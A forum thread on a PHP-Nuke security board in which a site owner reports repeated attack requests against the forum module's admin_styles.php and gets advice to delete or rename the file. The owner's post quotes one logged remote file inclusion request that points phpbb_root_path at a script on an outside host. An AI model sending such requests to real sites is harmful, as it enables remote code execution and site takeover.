PHP-Nuke Security - Been hacked? or have a question about securing your site, here's the place.

Hacker problem..

Hi,

I have Nuke Sentinel installed in my installation of 7.9 and I'm having problems.

I am getting requests like this:

Quote: :
modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.slupka.cz/tmp/sting.txt?

Nuke sentinel is blocking some of these requests and letting others through. My ISP is threatening to turn off my email access. (What is it? Sendmail? Can't remember!)

I've stuck an .htaccess file within the modules/Forums/admin/ folder, but I don't think that it is working. It should do, because it was generated by my isp. (..but why would I be getting blocked notices?)

Can anybody help me, please? Is there a security fix for admin_styles.php? How important is this file? Not having much .php knowledge, I can't tell.

Can admin_styles.php be renamed?

Your help would be much appreciated, thank you.

Best wishes,
SonnyM

Why you asking here? it's only likely to be me answering anyway. Laughing

Just delete/rename it, it's not something you use.

I can't understand why sentinel is only blocking it sometimes, that's a bit strange. Confused

Thanks D...
